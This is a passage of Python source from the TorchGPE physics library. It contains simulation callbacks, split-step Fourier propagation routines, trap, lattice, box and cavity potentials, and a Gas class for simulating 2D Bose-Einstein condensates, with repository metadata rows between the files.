Before a simulation starts, it is provided with the instance of the :class:`gpe.bec2D.gas.Gas` (stored in the :py:attr:`gpe.utils.callbacks.Callback.gas` variable) and with a dictionary of parameters for the simulation (stored in :py:attr:`gpe.utils.callbacks.Callback.propagation_params`)
"""
def __init__(self) -> None:
#: gpe.bec2D.gas.Gas: The instance of the :class:`gpe.bec2D.gas.Gas` class. Populated when the simulation starts.
self.gas = None
#: dict: A dictionary of parameters for the simulation. Populated when the simulation starts.
self.propagation_params = None
def set_gas(self, gas):
self.gas = gas
def set_propagation_params(self, propagation_params):
self.propagation_params = propagation_params
def on_propagation_begin(self):
"""Function called by the :class:`gpe.bec2D.gas.Gas` class before the simulation begins
"""
pass
def on_propagation_end(self):
"""Function called by the :class:`gpe.bec2D.gas.Gas` class after the simulation ends
"""
pass
def on_epoch_begin(self, epoch: int):
"""Function called by the :class:`gpe.bec2D.gas.Gas` at the beginning of each epoch
Args:
epoch (int): The epoch number
"""
pass
def on_epoch_end(self, epoch: int):
"""Function called by the :class:`gpe.bec2D.gas.Gas` at the end of each epoch
Args:
epoch (int): The epoch number
"""
pass
class LInfNorm(Callback):
"""Callback computing the :math:`L_\infty` norm of the wavefunction
The :math:`L_\infty` norm is defined as:
.. math::
L_\infty = \\text{max}_{(x,y)}|\Psi_t - \Psi_{t+\\Delta t}|
Args:
compute_every (int): Optional. The number of epochs after which the norm is computed. Defaults to 1.
print_every (int): Optional. The number of epochs after which, if computed, the norm is also printed. Defaults to 1.
"""
def __init__(self, compute_every=1, print_every=1) -> None:
super().__init__()
#: list: A list of the computed norms
self.norms = []
self.compute_every = compute_every
self.print_every = print_every
def on_epoch_begin(self, epoch: int):
"""At the beginning of an epoch, if its number is a multiple of ``compute_every`` stores the wave function of the gas
Args:
epoch (int): The epoch number
"""
if epoch % self.compute_every != 0:
return
self.psi = self.gas.psi
def on_epoch_end(self, epoch: int):
"""At the end of an epoch, if its number is a multiple of ``compute_every`` uses the stored wave function of the gas to compute
the :math:`L_\infty` norm. If the epoch number is a multiple of ``print_every`` as well, the value of the norm is printed on screen.
Args:
epoch (int): The epoch number
"""
if epoch % self.compute_every != 0:
return
psi = self.gas.psi
self.norms.append(torch.max(torch.abs(psi-self.psi)).cpu())
del self.psi
if epoch % self.print_every == 0:
print(self.norms[-1])
class L1Norm(Callback):
"""Callback computing the :math:`L_1` norm of the wavefunction
The :math:`L_1` norm is defined as:
.. math::
L_1 = \sum_{(x,y)}|\Psi_t - \Psi_{t+\\Delta t}| \, dx \, dy
Args:
compute_every (int): Optional. The number of epochs after which the norm is computed. Defaults to 1.
print_every (int): Optional. The number of epochs after which, if computed, the norm is also printed. Defaults to 1.
"""
def __init__(self, compute_every=1, print_every=1) -> None:
super().__init__()
#: list: A list of the computed norms
self.norms = []
self.compute_every = compute_every
self.print_every = print_every
def on_epoch_begin(self, epoch):
"""At the beginning of an epoch, if its number is a multiple of ``compute_every`` stores the wave function of the gas
Args:
epoch (int): The epoch number
"""
if epoch % self.compute_every != 0:
return
self.psi = self.gas.psi
def on_epoch_end(self, epoch):
"""At the end of an epoch, if its number is a multiple of ``compute_every`` uses the stored wave function of the gas to compute
the :math:`L_1` norm. If the epoch number is a multiple of ``print_every`` as well, the value of the norm is printed on screen.
Args:
epoch (int): The epoch number
"""
if epoch % self.compute_every != 0:
return
psi = self.gas.psi
self.norms.append((torch.sum(torch.abs(psi-self.psi))
* self.gas.dx*self.gas.dy).cpu())
del self.psi
if epoch % self.print_every == 0:
print(self.norms[-1])
class L2Norm(Callback):
"""Callback computing the :math:`L_2` norm of the wavefunction
The :math:`L_2` norm is defined as:
.. math::
L_2 = \sqrt{\sum_{(x,y)}|\Psi_t - \Psi_{t+\\Delta t}|^2 \, dx \, dy}
Args:
compute_every (int): Optional. The number of epochs after which the norm is computed. Defaults to 1.
print_every (int): Optional. The number of epochs after which, if computed, the norm is also printed. Defaults to 1.
"""
def __init__(self, compute_every=1, print_every=1) -> None:
super().__init__()
#: list: A list of the computed norms
self.norms = []
self.compute_every = compute_every
self.print_every = print_every
def on_epoch_begin(self, epoch):
"""At the beginning of an epoch, if its number is a multiple of ``compute_every`` stores the wave function of the gas
Args:
epoch (int): The epoch number
"""
if epoch % self.compute_every != 0:
return
self.psi = self.gas.psi
def on_epoch_end(self, epoch):
"""At the end of an epoch, if its number is a multiple of ``compute_every`` uses the stored wave function of the gas to compute
the :math:`L_2` norm. If the epoch number is a multiple of ``print_every`` as well, the value of the norm is printed on screen.
Args:
epoch (int): The epoch number
"""
if epoch % self.compute_every != 0:
return
psi = self.gas.psi
self.norms.append(torch.sqrt(
torch.sum(torch.abs(psi-self.psi)**2)*self.gas.dx*self.gas.dy).cpu())
del self.psi
if epoch % self.print_every == 0:
print(self.norms[-1])
| 6,819 | Python | .py | 145 | 38.22069 | 293 | 0.615036 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,171 | propagation.py | qo-eth_TorchGPE/torchgpe/utils/propagation.py | from .potentials import LinearPotential, NonLinearPotential
import torch
from tqdm.auto import tqdm, trange
def imaginary_time_propagation(gas, potentials, time_step, N_iterations, callbacks, leave_progress_bar=True):
"""Performs imaginary time propagation of a wave function.
Args:
gas (Gas): The gas whose wave function has to be propagated.
potentials (list): The list of potentials to apply.
time_step (float): The time step to use.
N_iterations (int): The number of iterations to perform.
callbacks (list): The list of callbacks to call at the end of each iteration.
leave_progress_bar (bool, optional): Whether to leave the progress bar after the propagation is complete. Defaults to True.
"""
# Divide the potentials in linear and nonlinear to precompute the linear ones
linear_potentials = [potential for potential in potentials if issubclass(
type(potential), LinearPotential)]
nonlinear_potentials = [potential for potential in potentials if issubclass(
type(potential), NonLinearPotential)]
for callback in callbacks:
callback.on_propagation_begin()
# Precompute kinetic propagator and the total linear potential
kinetic = 0.5 * sum(momentum**2 for momentum in gas.momenta)
kinetic_propagator = torch.exp(-0.5j * kinetic * time_step)
total_linear_potential = sum(potential.get_potential(*gas.coordinates) for potential in linear_potentials)
# Create a progress bar to monitor the evolution
pbar = trange(N_iterations, smoothing=0, desc="Ground state",
bar_format='{l_bar}{bar}| {n_fmt}/{total_fmt} [{elapsed}<{remaining}]', leave=leave_progress_bar)
for epoch in pbar:
for callback in callbacks:
callback.on_epoch_begin(epoch)
# One step of the split-step Fourier method
propagation_step(gas, total_linear_potential, [],
nonlinear_potentials, [], kinetic_propagator, time_step)
for callback in callbacks:
callback.on_epoch_end(epoch)
for callback in callbacks:
callback.on_propagation_end()
def real_time_propagation(gas, potentials, time_step, times, callbacks, leave_progress_bar=True):
"""Performs real time propagation of a wave function.
Args:
gas (Gas): The gas whose wave function has to be propagated.
potentials (list): The list of potentials to apply.
time_step (float): The time step to use.
times (list): The list of times to propagate to.
callbacks (list): The list of callbacks to call at the end of each iteration.
leave_progress_bar (bool, optional): Whether to leave the progress bar after the propagation is complete. Defaults to True.
"""
# Divide the potentials in linear and nonlinear, time dependent and time independent to precompute the static linear ones
static_linear_potentials = [potential for potential in potentials if issubclass(
type(potential), LinearPotential) and not potential.is_time_dependent]
dynamic_linear_potentials = [potential for potential in potentials if issubclass(
type(potential), LinearPotential) and potential.is_time_dependent]
static_nonlinear_potentials = [potential for potential in potentials if issubclass(
type(potential), NonLinearPotential) and not potential.is_time_dependent]
dynamic_nonlinear_potentials = [potential for potential in potentials if issubclass(
type(potential), NonLinearPotential) and potential.is_time_dependent]
for callback in callbacks:
callback.on_propagation_begin()
# Precompute kinetic propagator and the total static linear potential
kinetic = 0.5 * sum(momentum**2 for momentum in gas.momenta)
kinetic_propagator = torch.exp(-0.5j * kinetic * time_step)
total_static_linear_potential = sum(potential.get_potential(*gas.coordinates) for potential in static_linear_potentials)
# Create a progress bar to monitor the evolution
pbar = tqdm(times, smoothing=0, desc="Propagation",
bar_format='{l_bar}{bar}| {n_fmt}/{total_fmt} [{elapsed}<{remaining}]', leave=leave_progress_bar)
for epoch, t in enumerate(pbar):
for callback in callbacks:
callback.on_epoch_begin(epoch)
# One step of the split-step Fourier method
propagation_step(gas, total_static_linear_potential, dynamic_linear_potentials,
static_nonlinear_potentials, dynamic_nonlinear_potentials, kinetic_propagator, time_step, t)
for callback in callbacks:
callback.on_epoch_end(epoch)
for callback in callbacks:
callback.on_propagation_end()
def propagation_step(gas, total_static_linear_potential, dynamic_linear_potentials, static_nonlinear_potentials, dynamic_nonlinear_potentials, kinetic_propagator, time_step, time=None):
"""Performs one step of the split-step Fourier method.
Args:
gas (Gas): The gas whose wave function has to be propagated.
total_static_linear_potential (torch.Tensor): The total static linear potential.
dynamic_linear_potentials (list): The list of dynamic linear potentials.
static_nonlinear_potentials (list): The list of static nonlinear potentials.
dynamic_nonlinear_potentials (list): The list of dynamic nonlinear potentials.
kinetic_propagator (torch.Tensor): The kinetic propagator.
time_step (float): The time step to use.
time (float, optional): The in-simulation time . Defaults to None.
"""
gas.psik *= kinetic_propagator
gas.psi *= potential_propagator(gas, time_step, total_static_linear_potential,
dynamic_linear_potentials, static_nonlinear_potentials, dynamic_nonlinear_potentials, time)
gas.psik *= kinetic_propagator
def potential_propagator(gas, time_step, total_static_linear_potential, dynamic_linear_potentials, static_nonlinear_potentials, dynamic_nonlinear_potentials, time):
"""Computes the potential propagator.
Args:
gas (Gas): The gas whose wave function has to be propagated.
time_step (float): The time step to use.
total_static_linear_potential (torch.Tensor): The total static linear potential.
dynamic_linear_potentials (list): The list of dynamic linear potentials.
static_nonlinear_potentials (list): The list of static nonlinear potentials.
dynamic_nonlinear_potentials (list): The list of dynamic nonlinear potentials.
time (float): The in-simulation time.
"""
# Compute the static nonlinear potential and both the dynamic ones
total_static_nonlinear_potential = sum(potential.potential_function(
*gas.coordinates, gas.psi) for potential in static_nonlinear_potentials)
total_dynamic_linear_potential = sum(potential.get_potential(
*gas.coordinates, time) for potential in dynamic_linear_potentials)
total_dynamic_nonlinear_potential = sum(potential.potential_function(
*gas.coordinates, gas.psi, time) for potential in dynamic_nonlinear_potentials)
# Compute the propagator due to all the potentials
return torch.exp(-1j * (total_static_linear_potential + total_static_nonlinear_potential + total_dynamic_linear_potential + total_dynamic_nonlinear_potential) * time_step)
| 7,360 | Python | .py | 111 | 58.396396 | 185 | 0.723899 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,172 | potentials.py | qo-eth_TorchGPE/torchgpe/bec2D/potentials.py | from __future__ import annotations
from typing import Union, Callable
import scipy.constants as spconsts
import numpy as np
import torch
from ..utils.potentials import LinearPotential, NonLinearPotential, any_time_dependent_variable, time_dependent_variable
# --- Linear potentials ---
class Zero(LinearPotential):
"""Zero potential. It is equivalent to not applying any potential at all.
"""
def __init__(self):
super().__init__()
def get_potential(self, X: torch.tensor, Y: torch.tensor, time: float = None):
return torch.zeros_like(X)
class Trap(LinearPotential):
"""Harmonic trapping potential
Args:
omegax (Union[float, Callable]): The frequency along the x axis of the harmonic oscillator. It can be set to be either a constant or a function of time.
omegay (Union[float, Callable]): The frequency along the y axis of the harmonic oscillator. It can be set to be either a constant or a function of time.
"""
def __init__(self, omegax: Union[float, Callable], omegay: Union[float, Callable]):
super().__init__()
self.omegax = omegax
self.omegay = omegay
def on_propagation_begin(self):
self.is_time_dependent = any_time_dependent_variable(
self.omegax, self.omegay)
self._omegax = time_dependent_variable(self.omegax)
self._omegay = time_dependent_variable(self.omegay)
def get_potential(self, X: torch.tensor, Y: torch.tensor, time: float = None):
return 2*(np.pi/self.gas.adim_pulse)**2*((self._omegax(time)*X)**2+(self._omegay(time)*Y)**2)
class Lattice(LinearPotential):
"""Lattice potential
Args:
V0 (Union[float, Callable]): The lattice depth in units of the recoil energy. It can be set to be either a constant or a function of time.
lam (float): The wave length of the lattice.
theta (float): The angle of the lattice in the 2D plane.
phi (Union[float, Callable]): The phase of the lattice.
"""
def __init__(self, V0: Union[float, Callable] = 0, lam: float = 1e-6, theta: float = 0, phi: Union[float, Callable] = 0, w0: float = np.inf):
super().__init__()
self.V0 = V0
self.lam = lam
self.theta = theta
self.phi = phi
self.w0 = w0
def on_propagation_begin(self):
self._lam = self.lam/self.gas.adim_length
self._k = 2*np.pi/self._lam
self._w0 = self.w0/self.gas.adim_length
self._rayleigh = np.pi*self._w0**2/self._lam
self.Er = 0.5 * (spconsts.hbar*self._k /
self.gas.adim_length)**2 / self.gas.mass
self.is_time_dependent = any_time_dependent_variable(
self.V0, self.phi)
self._V0 = time_dependent_variable(self.V0)
self._phi = time_dependent_variable(self.phi)
self._w = self._w0 * \
torch.sqrt(1+(self.gas.X*np.cos(self.theta) +
self.gas.Y*np.sin(self.theta))**2/self._rayleigh**2)
self._R = self.gas.X*np.cos(self.theta) + self.gas.Y*np.sin(self.theta) + self._rayleigh**2/(self.gas.X*np.cos(self.theta) +
self.gas.Y*np.sin(self.theta))
self._gouy = torch.atan(
(self.gas.X*np.cos(self.theta) + self.gas.Y*np.sin(self.theta))/self._rayleigh)
self._Epos = lambda time: (1/torch.sqrt(1+(self.gas.X*np.cos(self.theta) + self.gas.Y*np.sin(self.theta))**2/self._rayleigh**2) * torch.exp(-(-self.gas.X*np.sin(self.theta) + self.gas.Y*np.cos(self.theta))**2/self._w**2) *
(
torch.exp(1j *
(self._k*((self.gas.X*np.cos(self.theta) + self.gas.Y*np.sin(self.theta)) + (-self.gas.X*np.sin(self.theta) + self.gas.Y*np.cos(self.theta))**2/(2*self._R)) - self._gouy
))
+
torch.exp(-1j *
(self._k*((self.gas.X*np.cos(self.theta) + self.gas.Y*np.sin(self.theta)) + (-self.gas.X*np.sin(self.theta) + self.gas.Y*np.cos(self.theta))**2/(2*self._R)) - self._gouy + self._phi(time)
))
)
)
def get_potential(self, X: torch.tensor, Y: torch.tensor, time: float = None):
return self._V0(time) * self.Er/(spconsts.hbar*self.gas.adim_pulse) * torch.abs(self._Epos(time))**2/4
class SquareBox(LinearPotential):
"""Square box potential
Args:
V (float): The depth of the box.
D (float): The size of the box.
"""
def __init__(self, V: float, D: float):
super().__init__()
self.V = V
self.D = D
def on_propagation_begin(self):
self._V = self.V/(spconsts.hbar*self.gas.adim_pulse)
self._D = self.D/self.gas.adim_length
self._box = self._V * (1-torch.heaviside(-torch.abs(self.gas.X)+self._D/2, torch.ones_like(self.gas.X)) *
torch.heaviside(-torch.abs(self.gas.Y)+self._D/2, torch.ones_like(self.gas.Y)))
def get_potential(self, X: torch.tensor, Y: torch.tensor, time: float = None):
return self._box
class RoundBox(LinearPotential):
"""Round box potential
Args:
V (float): The depth of the box.
D (float): The diameter of the box.
"""
def __init__(self, V: float, D: float):
super().__init__()
self.V = V
self.D = D
def on_propagation_begin(self):
self._V = self.V/(spconsts.hbar*self.gas.adim_pulse)
self._D = self.D/self.gas.adim_length
self._box = self._V*(1-torch.heaviside((self._D/2)**2 -
self.gas.X**2-self.gas.Y**2, torch.ones_like(self.gas.X)))
def get_potential(self, X: torch.tensor, Y: torch.tensor, time: float = None):
return self._box
# --- Non linear potentials ---
class Contact(NonLinearPotential):
"""Contact interactions potential
Args:
a_s (float): The scattering length in units of the Bohr radius.
a_orth (float): The renormalization parameter for the scattering length to account for the missing third dimension.
"""
def __init__(self, a_s: float = 100, a_orth: float = 1e-6):
super().__init__()
self.a_s = a_s
self.a_orth = a_orth
def on_propagation_begin(self):
self._a_s = self.a_s*spconsts.codata.value("Bohr radius")
self._g = np.sqrt(8*np.pi)*self.gas.N_particles*self._a_s/self.a_orth
def potential_function(self, X: torch.tensor, Y: torch.tensor, psi: torch.tensor, time: float = None):
return self._g*torch.abs(psi)**2
class DispersiveCavity(NonLinearPotential):
"""Transversally pumped dispersive cavity potential
Args:
lattice_depth (Union[float, Callable]): The lattice depth in units of the recoil energy. It can be set to be either a constant or a function of time.
atomic_detuning (float): The atomic frequency detuning with respect to the pump.
cavity_detuning (Union[float, Callable]): The cavity's frequency detuning with respect to the pump. It can be set to be either a constant or a function of time.
cavity_decay (float): The cavity's decay rate.
cavity_coupling (float): The coupling constant between the gas and the cavity.
cavity_angle (float, optional): The angle in the 2D plane of the cavity. Defaults to :math:`0`
pump_angle (float, optional): The angle in the 2D plane of the transversal pump. Defaults to :math:`\\pi/3`
waist (float, optional): the waist of the gaussian beam. Defaults to infinity
"""
def __init__(self, lattice_depth: Union[float, Callable], atomic_detuning: float, cavity_detuning: Union[float, Callable], cavity_decay: float, cavity_coupling: float, cavity_angle: float = 0, pump_angle: float = np.pi/3, waist: float = np.inf):
super().__init__()
self.lattice_depth = lattice_depth
self.atomic_detuning = atomic_detuning
self.cavity_detuning = cavity_detuning
self.cavity_decay = cavity_decay
self.cavity_coupling = cavity_coupling
self.cavity_angle = cavity_angle
self.pump_angle = pump_angle
self.waist = waist
def on_propagation_begin(self):
self.is_time_dependent = any_time_dependent_variable(
self.cavity_detuning, self.lattice_depth)
self._cavity_detuning = time_dependent_variable(self.cavity_detuning)
self._lattice_depth = time_dependent_variable(self.lattice_depth)
self.g0 = 2*np.pi*self.cavity_coupling
self._atomic_detuning = 2*np.pi*self.atomic_detuning
self.kappa = 2*np.pi*self.cavity_decay
self.freq_d2 = self.gas.d2_pulse
self.lambda_pump = 2*np.pi*spconsts.c / \
(self.freq_d2+self._atomic_detuning)
self.adim_lambda_pump = self.lambda_pump/self.gas.adim_length
self.k_pump = 2*np.pi/self.lambda_pump
self.adim_k_pump = 2*np.pi/self.adim_lambda_pump
self.Er = 0.5 * (spconsts.hbar*self.k_pump)**2 / self.gas.mass
self.U0 = self.g0**2 / self._atomic_detuning
self._adim_waist = self.waist / self.gas.adim_length
R_pump = self.gas.X * \
np.cos(self.pump_angle) + self.gas.Y * np.sin(self.pump_angle)
R_pump_orth = - self.gas.X * \
np.sin(self.pump_angle) + self.gas.Y * np.cos(self.pump_angle)
R_cavity = self.gas.X * \
np.cos(self.cavity_angle) + self.gas.Y * np.sin(self.cavity_angle)
self.COS2 = torch.cos(self.adim_k_pump*R_cavity)**2
self.COS = torch.cos(self.adim_k_pump*R_pump) * \
torch.cos(self.adim_k_pump*R_cavity)
self.c1 = self.gas.N_particles*self.gas.dx*self.gas.dy
self.c3 = self.c1*self.U0
self.eta_prefactor = np.sqrt(self.Er*np.abs(self._atomic_detuning)/spconsts.hbar) * \
self.g0/self._atomic_detuning
self._gaussian_profile = 1/(1+(self.adim_lambda_pump*R_pump/(np.pi*self._adim_waist**2))**2)*torch.exp(
-2 * R_pump_orth**2/(self._adim_waist**2 + (self.adim_lambda_pump*R_pump/(np.pi*self._adim_waist))**2))
self._pump_lattice = np.sign(self._atomic_detuning) * self.Er * torch.cos(
self.adim_k_pump*R_pump)**2 / (spconsts.hbar * self.gas.adim_pulse) * self._gaussian_profile
self._cavity_lattice = self.COS2 * self.U0 / self.gas.adim_pulse
def get_alpha(self, psi: torch.tensor, time: float = None):
"""Return the intracavity field
Args:
psi (torch.tensor): The wave function of the gas
time (float, optional): The time at which to compute the intracavity field. Defaults to None.
Returns:
float: The intracavity field :math:`\\alpha`
"""
order = self. get_order(psi)
bunching = (torch.abs(psi)**2*self.COS2).sum()
self._cavity_detuning_tilde = 2*np.pi * \
self._cavity_detuning(time)-self.c3*bunching
self.c6 = self.c2-self.c3*bunching
self.eta = np.sqrt(self._lattice_depth(time))*self.eta_prefactor
alpha = self.c1*self.eta*order/self.c6
return alpha
def get_order(self, psi: torch.tensor):
"""Return the order parameter for self-organization
Args:
psi (torch.tensor): The wave function of the gas
Returns:
float: The order parameter
"""
return (torch.abs(psi)**2*self.COS).sum()
def potential_function(self, X: torch.tensor, Y: torch.tensor, psi: torch.tensor, time: float = None):
self.c2 = 2*np.pi*self._cavity_detuning(time)+1j*self.kappa
alpha = self.get_alpha(psi, time)
self.pump_lattice = self._lattice_depth(time) * self._pump_lattice
cavity_lattice = torch.abs(alpha)**2 * self._cavity_lattice
interaction = 2 * torch.sqrt(self._gaussian_profile) / self.gas.adim_pulse * self.eta*self.COS*torch.real(alpha)
return self.pump_lattice + cavity_lattice + interaction | 11,954 | Python | .py | 215 | 46.344186 | 249 | 0.626435 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,173 | gas.py | qo-eth_TorchGPE/torchgpe/bec2D/gas.py | from typing import List, Union
import torch
import numpy as np
from torch.nn.functional import pad
import scipy.constants as spconsts
from .potentials import Zero
from ..utils import normalize_wavefunction, ftn, iftn
from ..utils.elements import elements_dict
from ..utils.potentials import Potential
from ..utils.propagation import imaginary_time_propagation, real_time_propagation
from ..utils.callbacks import Callback
UPDATED_PSI = 0
UPDATED_PSIK = 1
UPDATED_BOTH = 2
class Gas():
"""Quantum gas.
The parameters :py:attr:`N_grid` and :py:attr:`grid_size` specify a computational grid on which the wavefunction
is defined and evolved. :class:`Gas` exposes methods to perform real time propagation and to compute the ground
state's wave function via imaginary time propagation.
Args:
element (str): Optional. The element the gas is made of. Defaults to "87Rb".
N_particles (int): Optional. The number of particles in the gas. Defaults to :math:`10^6`.
N_grid (int): Optional. The number of points on each side of the computational grid. Defaults to :math:`2^8`.
grid_size (float): Optional. The side of the computational grid. Defaults to :math:`10^{-6}`.
device (torch.device or None): Optional. The device where to store tensors. Defaults to None, meaning that GPU will be used if available.
float_dtype (:py:attr:`torch.dtype`): Optional. The dtype used to represent floating point numbers. Defaults to :py:attr:`torch.double`.
complex_dtype (:py:attr:`torch.dtype`): Optional. The dtype used to represent complex numbers. Defaults to :py:attr:`torch.complex128`.
adimensionalization_length (float): Optional. The unit of length to be used during the simulations. Defaults to :math:`10^{-6}`.
"""
def __init__(self, element: str = "87Rb", N_particles: int = int(1e6),
N_grid: int = 2**8, grid_size: float = 1e-6,
device: Union[torch.device, None] = None, float_dtype: torch.dtype = torch.double, complex_dtype: torch.dtype = torch.complex128, adimensionalization_length: float = 1e-6) -> None:
#: str: The element the gas is made of.
self.element = element
#: float: The mass of the gas. This is automatically derived from the :py:obj:`~Gas.element` parameter.
self.mass = elements_dict[self.element]["m"]
#: float: The pulse of the :math:`d_2` line. This is automatically derived from the :py:obj:`~Gas.element` parameter.
self.d2_pulse = elements_dict[self.element]["omega d2"]
if (N_particles != int(N_particles)):
raise TypeError("The number of particles must be an integer")
#: int: The number of particles in the gas.
self.N_particles = int(N_particles)
# If no custom device has been specified, use GPU if available
#: torch.device: The device where to store tensors.
self.device = device if device is not None else torch.device(
"cuda" if torch.cuda.is_available() else "cpu")
#: torch.dtype: The dtype used to represent floating point numbers.
self.float_dtype = float_dtype
#: torch.dtype: The dtype used to represent complex numbers.
self.complex_dtype = complex_dtype
# Adimensionalization length and pulse to do calculations with pure numbers
#: float: Adimensionalization length used to work with pure numbers.
self.adim_length = adimensionalization_length
#: float: Adimensionalization pulse used to work with pure numbers. Its value is :math:`\frac{\hbar}{m l^2}`, where :math:`m` is the mass and :math:`l` the adimensionalization length.
self.adim_pulse = spconsts.hbar/(self.mass*self.adim_length**2)
# Create the grid in adimenisonalized units
#: float: The side of the computational grid along the :mathx axis in adimensionalized units.
self.grid_size_x = grid_size / self.adim_length
#: float: The side of the computational grid along the y axis in adimensionalized units.
self.grid_size_y = grid_size / self.adim_length
#: int: The number of points on each side of the computational grid.
self.N_grid = int(N_grid)
# Grid in real space
# The grid is centered in 0, with a total side length of grid_size/adim_length.
# The total grid is made of N_grid**2 points
#: torch.Tensor: The vector of adimensionalized grid coordinates along the :math:`x` axis.
self.x = torch.linspace(-self.grid_size_x/2, self.grid_size_x/2,
self.N_grid, dtype=self.float_dtype, device=self.device)
#: torch.Tensor: The vector of adimensionalized grid coordinates along the :math:`y` axis.
self.y = torch.linspace(-self.grid_size_y/2, self.grid_size_y/2,
self.N_grid, dtype=self.float_dtype, device=self.device)
#: float: The distance between two consecutive points of the grid along the :math:`x` axis in adimensionalized units.
self.dx = self.x[1]-self.x[0]
#: float: The distance between two consecutive points of the grid along the :math:`y` axis in adimensionalized units.
self.dy = self.y[1]-self.y[0]
coordinates = torch.meshgrid(self.x, self.y, indexing="xy")
#: torch.Tensor: The matrix of :math:`x` coordinates of the grid in adimensionalized units.
self.X = coordinates[0]
#: torch.Tensor: The matrix of :math:`y` coordinates of the grid in adimensionalized units.
self.Y = coordinates[1]
del coordinates
# Grid in momentum space
#: torch.Tensor: The vector of adimensionalized momenta along the :math:`kx` axis.
self.kx = 2*np.pi * torch.fft.fftshift(torch.fft.fftfreq(
self.N_grid + 2 * (self.N_grid//2), self.dx, dtype=self.float_dtype, device=self.device))
#: torch.Tensor: The vector of adimensionalized momenta along the :math:`ky` axis.
self.ky = 2*np.pi * torch.fft.fftshift(torch.fft.fftfreq(
self.N_grid + 2 * (self.N_grid//2), self.dy, dtype=self.float_dtype, device=self.device))
#: float: The distance between two consecutive points of the grid along the :math:`kx` axis in adimensionalized units.
self.dkx = self.kx[1] - self.kx[0]
#: float: The distance between two consecutive points of the grid along the :math:`ky` axis in adimensionalized units.
self.dky = self.ky[1] - self.ky[0]
momenta = torch.meshgrid(self.kx, self.ky, indexing="xy")
#: torch.Tensor: The matrix of :math:`kx` coordinates of the grid in adimensionalized units.
self.Kx = momenta[0]
#: torch.Tensor: The matrix of :math:`ky` coordinates of the grid in adimensionalized units.
self.Ky = momenta[1]
del momenta
# Create the wave functions
self._psi = torch.zeros_like(self.X)
self._psik = torch.zeros_like(self.Kx)
# Specifies the last updated wave function (psi or psik)
self._updated_wavefunction = None
def ground_state(self, potentials: List[Potential] = [], time_step: complex = -1e-6j, N_iterations: int = int(1e3), callbacks: List[Callback] = [], leave_progress_bar=True):
"""Compute the ground state's wave function.
Use the split-step Fourier method with imaginary time propagation (ITP) to compute the ground state's wave function of the gas.
The potentials acting on the system are specified via the :py:attr:`potentials` parameter.
Args:
potentials (List[:class:`~gpe.utils.potentials.Potential`]): Optional. The list of potentials acting on the system. Defaults to [].
time_step (complex): Optional. The time step to be used in the ITP. Defaults to :math:`-10^{-6}\,i`.
N_iterations (int): Optional. The number of steps of ITP to perform. Defaults to :math:`10^{3}`.
callbacks (List[:class:`~gpe.utils.callbacks.Callback`]): Optional. List of callbacks to be evaluated during the evolution. Defaults to [].
leave_progress_bar (bool): Optional. Whether to leave the progress bar on screen after the propagation ends. Defaults to True.
Raises:
Exception: If time dependent potentials are specified
Exception: If the time step is not a purely imaginary number
Exception: If the imaginary part of the time step is not positive
Exception: If neither the wave function in real space nor in the one in momentum space have been initialized
"""
# Initial setup of the potentials
for potential in potentials:
potential.set_gas(self)
potential.on_propagation_begin()
# --- Process parameters ---
if any(potential.is_time_dependent for potential in potentials):
raise Exception(
"Time dependent potentials can't be used in imaginary time propagation")
if time_step.real != 0:
raise Exception(
"Imaginary time propagation requires a purely imaginary time step")
if np.imag(time_step) >= 0:
raise Exception(
"The imaginary part of the time step must be negative")
if self._updated_wavefunction is None:
raise Exception(
"The initial wave function must be initialized by either setting the psi or psik attributes")
N_iterations = int(N_iterations)
# Adimensionalize the time_step
adim_time_step = time_step * self.adim_pulse
# If no potential has been specified, use an identically zero one
if len(potentials) == 0:
potentials = [Zero(None)]
# Generate a dictionary of runtime settings for the simulations to be given
# to the callbacks. This list is not complete at the moment
propagation_parameters = {
"potentials": potentials,
"time_step": time_step,
"N_iterations": N_iterations,
}
# Initial setup of the callbacks
for callback in callbacks:
callback.set_gas(self)
callback.set_propagation_params(propagation_parameters)
imaginary_time_propagation(
self, potentials, adim_time_step, N_iterations, callbacks, leave_progress_bar)
def propagate(self, final_time: float, time_step: float = 1e-6, potentials: List[Potential] = [], callbacks: List[Callback] = [], leave_progress_bar=True):
"""Propagate the wave function in real time.
Use the split-step Fourier method with real time propagation (RTP) to propagate the gas wave function to :py:attr:`final_time`.
The potentials acting on the system are specified via the :py:attr:`potentials` parameter.
Note:
The time step is adjusted such that :py:attr:`final_time` is always reached.
Args:
final_time (float): The final time up to which the wave function whould be propagated.
time_step (float): Optional. The time step to be used in the RTP. Defaults to :math:`10^{-6}`.
potentials (List[:class:`~gpe.utils.potentials.Potential`]): Optional. The list of potentials acting on the system. Defaults to [].
callbacks (List[:class:`~gpe.utils.callbacks.Callback`]): Optional. List of callbacks to be evaluated during the evolution. Defaults to [].
leave_progress_bar (bool): Optional. Whether to leave the progress bar on screen after the propagation ends. Defaults to True.
Raises:
Exception: If the time step is not a floating point number
Exception: If the time step is not positive
Exception: If neither the wave function in real space nor in the one in momentum space have been initialized
"""
# Initial setup of the potentials
for potential in potentials:
potential.set_gas(self)
potential.on_propagation_begin()
# --- Process parameters ---
if not issubclass(type(time_step), (float, )):
raise Exception(
"The provided time step is not a floating point number.")
if time_step <= 0:
raise Exception("Propagation requires a positive time step")
# Adjust the time step such that the final time is always reached
N_iterations = round(final_time/time_step)
time_step = final_time/N_iterations
# Array of times to be passed to the time dependent potentials
times = torch.linspace(0, final_time, N_iterations)
# Adimensionalize the time_step
adim_time_step = time_step * self.adim_pulse
if self._updated_wavefunction is None:
raise Exception(
"The initial wave function must be initialized by setting either the psi or psik attributes")
# If no potential has been specified, use an identically zero one
if len(potentials) == 0:
potentials = [Zero(None)]
# Generate a dictionary of runtime settings for the simulations to be given
# to the callbacks. This list is not complete at the moment
propagation_parameters = {
"potentials": potentials,
"time_step": time_step,
"N_iterations": N_iterations,
"final_time": final_time
}
# Initial setup of the callbacks
for callback in callbacks:
callback.set_gas(self)
callback.set_propagation_params(propagation_parameters)
real_time_propagation(
self, potentials, adim_time_step, times, callbacks, leave_progress_bar)
@property
def density(self):
"""The density of the gas in real space
"""
return torch.abs(self.psi)**2
@property
def densityk(self):
"""The density of the gas in momentum space
"""
return torch.abs(self.psik)**2
@property
def phase(self):
